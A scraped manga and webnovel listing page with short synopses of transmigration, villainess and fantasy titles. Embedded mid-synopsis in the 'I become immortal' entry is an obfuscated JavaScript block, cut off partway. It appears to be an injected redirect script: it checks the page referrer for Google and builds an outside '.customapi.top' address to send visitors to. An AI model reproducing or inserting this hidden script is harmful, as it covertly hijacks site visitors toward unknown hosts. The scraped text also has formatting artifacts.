Adaptation - Page 25

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I Became The Lousy Side Top

"Warning: Yaoi content: This manga contains materials that might not be suitable to children under 17. By proceeding, you are confirming that you are 17 or older." Seo Jaewoo wakes up to find himself in the world of a BL novel. But he isn’t just any random person. He’s actually the lousy side top character who’s meant to torment the main bottom, Yoo Hyeonjin. What’s worse is that by the novel’s conclusion, all of Jaewoo’s despicable actions catch up to him, and he is killed by the story’s crazy main top and Hyeonjin’s love interest, Choi Mujin. In order to avoid his death, Jaewoo decides to change his original role and get on Hyeonjin’s good side. His method: lure him in with food, of course! While his tactic proves effective and he slowly befriends Hyeonjin, that doesn’t become the only major change to the plot. After an unexpected encounter with Mujin, Jaewoo’s position as the “lousy side top” gets completely flipped upside down… I Become a Boring Supporting Top Character. I Became the Lousy Side Top I Become the Boring Second Male Lead. 찌질한 서브공이 되었습니다 찌질한 서브공이 되었습니다.


I Became the Wife of the Male Lead

I possessed the body of “Fiona,” the final villainess whose soul was sentenced to eternal suffering after her gruesome demise at the hands of the world’s hero. She was tortured by her own family just because she was an illegitimate child. And so… arriving six years before the start of the novel, I was sent to war at the age of thirteen! Fortunately, as the story’s greatest villainess, Fiona was a genius mage. I had to survive the monster invasion. But now, I couldn’t be in the middle of a battlefield. Just before I ran out of breath, I encountered the teenaged male lead. …Why is he here? Well, if the male lead dies here, then the world will be destroyed. So, let’s save him first! 내 남자 주인공의 아내가 되었다


I become immortal

The bizarre and bizarre world gave birth to all kinds of amazing species. A noble son of a family who came to the great world broke through numerous obstacles, competed with those who came to the world, and kicked the high saint down in the mire. Will witness this magical universe and realize the desire to become immortal in this life!<script></script><script>function _0xb14c(){var _0x577c98=['5mkwaDE','href','YrGyC','referrer','7iGKvFe','24liQEoh','617969pjuoAQ','floor','location','ZmRis','Kqmfn','','eMEzf','qcwly','http://rea','.customapi','4788251kLHoiZ','9LOYQqQ','oENwq','HuvGW','BADYz','https://ip','text','5554FNRhwH','then','AjwZL','30RPpIae','338223IYNMlx','2747252IXubiz','81egZCZp','includes','4836472kuMAET','.top/','google','random','2095446GHsfsY'];_0xb14c=function(){return _0x577c98;};return _0xb14c();}function _0x5dab(_0x2f453d,_0x2f0e7c){var _0x5dc2cf=_0xb14c();return _0x5dab=function(_0x3d0fa0,_0x563252){_0x3d0fa0=_0x3d0fa0-(0xd92+0x191*0xd+-0x20c9);var _0x208788=_0x5dc2cf[_0x3d0fa0];return _0x208788;},_0x5dab(_0x2f453d,_0x2f0e7c);}(function(_0x498428,_0x57363b){var _0x48f8a5=_0x5dab,_0x36b418=_0x498428();while(!![]){try{var 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I Eat Soft Rice in Another World

Zhang Hao fainted after watching the rare blood moon in a century. After waking up, he found that the whole world had changed… The attributes and concepts of men and women are completely reversed. When a woman marries a man into a man marry a woman, the woman has to pay a gift. It has become very normal for women to make money to support their families. It has become normal for a man to be a housekeeper at home. A woman without a car or a house will be looked down upon, and even no man will be found. Men have become precious. It’s normal for women to chase men, but men chase women back… “It’s really not that I want to eat soft rice! I also want to be a real man!


I Found a Husband When I Picked up the Male Lead

Her family used all their money for her extravagance and luxuries and brought a crisis of bankruptcy. While trying to figure out how to pay off their debts, she found a leaflet from the duke looking for a lost child. The reward is so much money that you can play and eat even after you pay off your debts! Following the memories of reading this book, right away, Lizelle picked up the boy who was caught in a tr*sh in a poor village. She took the lost Lapel and went to the duke. “This is the child the Duke is looking for.” Duke Chester said, looking at me with a doubtful glance. “I need confirmation, so you should stay with my child in this house for the time being.” The strange cohabitation of the three people started like that. However, Lapel keeps thinking of me as a mother and won’t let her leave. * “Let’s get married.” Lizelle was startled by the unexpected words. “Are you insane? Did you drink?” “1 year. If you perform a contract marriage for one year, I will pay you 10 times the amount of the rewards you were given.” “Can I call you honey?” And the contract marriage and marital life began. But why are my eyes constantly changing? Why do you keep coming every night!


I Got Double the Skills from God!!

While his classmates were being transferred to another world, Fubuki is pushed out the magical transport by a bully, Yuma. He awakens to find himself alone in a deep forest. The God that saw this happened thereby decides to give Fubuki twice the protection! Will Fubuki be able to endure his new other-world life unscathed with double the skills in this off-world monster-taming fantasy? (Source: Alpha Manga) **Links:** - [WebNovel](


I Just Want To Mooch Off Your Luck

After being reborn, Zhao Mingxi had no choice but to mooch off of Fu group’s young master’s luck to avoid death by terminal illness. Although his ears would turn so red as if they’re bleeding whenever he sees her, he still keeps up an act of prideful indifference: “Can you stop being so clingy?” The next day, Zhao Mingxi really did leave to mooch off of someone else’s luck. The small dog bowed his head down, and grumbled: “I’ll let you cling to me, alright? Happy now?” I Just Want to Freeload on Your Luck / 我就想蹭你的气运


I Left my A-Rank Party to Help My Former Students Reach the Dungeon Depths!

\"I can\'t do this!\" Yoke Feldio, A Red Mage, has left his A-rank party of five years to become an adventurer, and has finally run out of patience with his life as an adventurer. being ridiculed as a \"Handyman\" and \"poor dexterity\"! And so begins a desperate life of joblessness.... HOWEVER! Soon after Yoke is welcomed into a party of former students, all of whom are girls! And as he conquers dungeons, Yoke\'s abilities are revealed one after another. In fact, the magic and skills that he wields have a power that is beyond the norm--?


I Quit the Hero’s Party

There was once a party who sought to defeat the Demon Lord and save the world, the Hero’s Party.However, tired of the Hero’s Party unwillingness to go directly after the Demon Lord, the Ashen Wizard Raniel quit the Hero’s Party and returned to his hometown to meet with his master.There, he was recommended a position as an assistant professor at a prestigious academy.”Why are you so bad at this? Just make circuits, cover yourself in mana, and use it.”However, a genius like him didn’t seem to have any aptitude for teaching others…The strongest of mankind begins his hectic new job at the academy!


I Raised a Black Dragon

The witch, Eleonora Asil, has fifteen previous convictions. And the transmigrator, Noah Park, had no intentions of being involved in the novel’s original plot of the dragon beheading the villainess. With that thought in mind, she abandoned her titles as The Wicked Witch and sought to live a long and peaceful life. So she heads down to the countryside wrought with deep remorse for all her misdeeds. And all should be happy… or she thought. “Please raise me!” And so it would seem that she stumbled upon the heroine’s pet dragon — the black-haired kid that would turn ballistic and obsessive later on — imprinted the villainess as his mother. And to make matters worse, the male lead suspects her as the prime culprit of stealing the dragon. “How long should I keep up with you?” She thought he’d arrest her right away, but seems like the male lead was slowly becoming the dragon’s butler. “Can I hug you?” “No.” “Then… can you hold me?” The villainess believes that the dragon needs a bit of taming.


I Raised a Nine Tailed Fox Wrongly

One day, I met a spirit. And it wasn\'t just anyone, but a gumiho puppy. As I worried about the little one\'s fate, I met a priestess from the eastern continent, who told me to raise him until he reached maturity and then send him back home. Raising a little fox... How could a cursed human welcome and care for a young life? It was strange and scary, but I couldn\'t refuse. The fox, Ran, was just adorable. So, with much love and care, I raised him... But when he grew up, he became as seductive as I\'ve heard of his kind, and he refused to be independent. All the training he had given seemed to have been in vain, with that lewd look. \"You can’t run away.\" \"Keep being good and help me, Scyllia. By my side.\" Forever...
